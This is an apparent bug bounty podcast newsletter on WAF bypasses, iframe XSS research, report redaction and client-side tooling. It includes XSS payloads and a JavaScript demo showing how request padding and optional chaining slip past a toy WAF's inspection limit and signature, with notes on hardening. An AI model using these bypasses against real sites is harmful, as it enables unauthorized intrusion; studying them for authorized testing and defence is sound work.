Critical Thinking - Bug Bounty Podcast
[HackerNotes Ep. 73] Sandboxed IFrames and WAF Bypasses
Content from NahamCon, WAF Bypasses, iFrame research and more!
Hacker TLDR;
WAF Bypasses: A new tool from the Assetnote team, NoWafPls, pads requests with junk data so that the payload lands beyond the portion of the request the WAF actually inspects: https://github.com/assetnote/nowafpls. JavaScript's optional chaining operator may also prove useful: alert?.(1337,)?.()
Programs Redacting Reports: Some programs have been silently redacting hunters' reports. It might be a good idea to create a cronjob or other means of backing up your reports so you can still read them later if this happens to you.
Exploiting iFrames: Johan Carlsson dropped an iFrame XSS challenge and, off the back of it, released a solid blog post covering a tonne of iframe gadgets and behaviours: https://joaxcar.com/blog/2024/05/16/sandbox-iframe-xss-challenge-solution/.
If you’re looking for more iFrame research to add to your arsenal, check this one out: https://blog.huli.tw/2022/04/07/en/iframe-and-window-open/
Clientside Extensions: If you're looking for extensions to help trace sources and sinks and exploit clientside bugs, check out DOMLoggerpp and DOM Invader (more on both in the section below).
WAF Bypasses
This week is a good week for some WAF bypass techniques. If you tuned into NahamCon over the weekend, Shubs and the team at Assetnote dropped a great talk on bypassing WAFs alongside a new tool. Check out the talk here https://www.youtube.com/watch?v=0OMmWtU2Y_g&ab_channel=NahamSec.
NoWafPls
NoWafPls works by padding requests with junk data. Many WAFs only inspect the first part of a request body (8 KB is a common limit, though some inspect more) before handing it on, so if you insert 8 KB or more of junk ahead of your payload, the payload falls outside the inspected window while the backend still parses the full request. The one thing to watch is that the padding has to be inert for the backend parser (an extra JSON member, form parameter or XML comment, for example), otherwise you break the very request you are trying to smuggle through.
If you’re a Caido user, Justin dropped a Caido port for this here: https://gist.github.com/Rhynorater/ace68d4976357ca0937cb4669f303306
JavaScript Optional Chaining Operator
On a slightly related note, JavaScript's optional chaining operator (?.) can also help bypass WAF signatures that look for alert( and friends: the call below never contains the string alert( yet still invokes alert. Original tweet here https://x.com/garethheyes/status/1786836956032176215:
alert?.(1337,)?.()
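The two weaknesses above, the limited inspection window that NoWafPls exploits and the signature that optional chaining sidesteps, as an added example against a toy WAF written for these notes (this is not the NoWafPls tool and not Gareth's original snippet). The 8 KB limit, the two signature regexes and the sample payloads are assumptions chosen for illustration; the point is to see which verdicts change, why, and that a padded body still parses on the backend.

```javascript
// Added example for this page, not the NoWafPls tool or Gareth Heyes' code:
// a toy WAF with the two weaknesses discussed above, plus the payloads that
// slip past each. The limit, signatures and payloads are assumptions.

// Assumed: the WAF only inspects the first 8 KB of a request body.
const INSPECT_LIMIT = 8 * 1024;

// Assumed naive signature: a rule that looks for "alert(" style sinks.
const NAIVE_SIGNATURE = /\balert\s*\(/i;

// Hardened variant (still a toy): also tolerates an optional-chaining call.
const HARDENED_SIGNATURE = /\balert\s*(\?\.)?\s*\(/i;

// Toy WAF: block if the signature matches inside the inspected window.
function toyWaf(body, limit = INSPECT_LIMIT, signature = NAIVE_SIGNATURE) {
  const inspected = body.slice(0, limit);
  return signature.test(inspected) ? 'blocked' : 'allowed';
}

// Bypass 1 (the NoWafPls idea): prepend junk so the payload lands beyond the
// limit. The junk must be inert for the backend parser, so here it is an extra
// JSON member placed before the real fields; JSON.parse() still yields them.
function padJsonBody(fields, padBytes = INSPECT_LIMIT) {
  const junk = 'A'.repeat(padBytes);
  return JSON.stringify({ _pad: junk, ...fields });
}

// Bypass 2: optional chaining. `alert?.(1337,)?.()` never contains the
// substring "alert(" but still calls alert with 1337. The trailing comma is
// legal in an argument list, and alert returns undefined, so the final `?.()`
// short-circuits instead of throwing.
const OPTIONAL_CHAIN_PAYLOAD = 'alert?.(1337,)?.()';

// Run a JS payload the way a page would, with alert() stubbed to record calls.
function runWithStubbedAlert(js) {
  const calls = [];
  const alert = (...args) => { calls.push(args); };
  new Function('alert', js)(alert);
  return calls;
}

function demo() {
  const payload = '<img src=x onerror=alert(1)>';       // constructed sample
  const plain = JSON.stringify({ q: payload });
  const padded = padJsonBody({ q: payload });
  const chained = JSON.stringify({ q: OPTIONAL_CHAIN_PAYLOAD });
  return {
    plainVerdict: toyWaf(plain),                          // 'blocked'
    paddedVerdict: toyWaf(padded),                        // 'allowed': past the window
    payloadOffset: padded.indexOf(payload),               // > 8192
    paddedStillParses: JSON.parse(padded).q === payload,  // true: backend still sees it
    chainVerdict: toyWaf(chained),                        // 'allowed': no "alert(" substring
    chainCalls: runWithStubbedAlert(OPTIONAL_CHAIN_PAYLOAD), // [[1337]]
    hardenedChainVerdict: toyWaf(chained, INSPECT_LIMIT, HARDENED_SIGNATURE), // 'blocked'
    // Padding only loses when the WAF inspects the whole body:
    hardenedPaddedVerdict: toyWaf(padded, Infinity, HARDENED_SIGNATURE),      // 'blocked'
  };
}

console.log(demo());
```

Run it with node and compare the verdicts: the padded body is waved through purely because the signature never sees the payload, and fixing the regex does nothing until the inspection limit is lifted. Real WAFs normalise and decode the body before matching, so when you test padding against a live target, put the junk where the backend's parser will ignore it, not just anywhere in the byte stream.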
Programs Redacting Reports
Some people in the community have found parts of their own reports redacted by the program. This can be quite frustrating, especially if you're looking back through old reports for payloads or to retry some bypasses. It might be worth taking backups of all your reports (maybe via a cronjob, once a day or week) to make sure you can always view them if you ever need to.
We aren't sure why some programs are doing this; if you'd like to keep your finger on the pulse, check out the thread here: https://x.com/Rhynorater/status/1790476314635301352
Exploiting CORS * Origin
This one seems to have been patched now, but keeping an eye out for strange behaviours like this can pay off. From one of HackerScrolls' older tweets (check it out here https://x.com/MtnBer/status/1794657827115696181), there were instances where a wildcard Access-Control-Allow-Origin: * header could be exploited via Chrome's caching behaviour.
A good place to look for new features and behaviours that can lead to bugs like this is the Chromium intent-to-ship mailing list here: https://groups.google.com/a/chromium.org/g/blink-dev. All new features being released and tested in the browser are documented there and open to public discussion. Equally, for all Critical Thinkers in the Critical Thinking Discord, an 'Intent to ship' channel exists so subscribers can easily track these and keep up to date.
Exploiting iFrames & Johan's Sandbox iFrame XSS Challenge
You should be familiar with Johan Carlsson if you're a regular listener of the pod. If you aren't, Johan has something of a speciality in finding pretty cool bugs on hardened targets like GitLab and GitHub.
He dropped an iFrame XSS challenge a few weeks back. The challenge, as described on the blog: '…The challenge page https://sandbox-iframe-ctf.glitch.me allows for arbitrary HTML in the search parameter xss as a Base64 encoded string. The HTML will be put inside a sandboxed iframe on the same page. The page will also add a flag to the hash portion of the URL upon visiting the site. The mission was to leak this flag in the hash and show the value in an alert box.'
If you're looking for a good resource that explains the intricacies of CSP, iframes and sandboxing, and how to exploit them, this writeup is for you: https://joaxcar.com/blog/2024/05/16/sandbox-iframe-xss-challenge-solution/
On a similar note, this blog contains a LOT of iFrame gadgets, tips, behaviours and quirks - these two resources alone should help you with a few exploits: https://blog.huli.tw/2022/04/07/en/iframe-and-window-open/
Clientside Extensions
Tracing sources and sinks clientside can sometimes be a headache. If you want to try some extensions to help you out on this endeavour, two worth noting are DOMLoggerpp and DOM Invader. DOMLoggerpp seems to be the more customizable of the two (I'm still yet to use it), and DOM Invader has been baked into Burp's built-in browser for some time now. Check them out below:
Till next time. Keep hacking!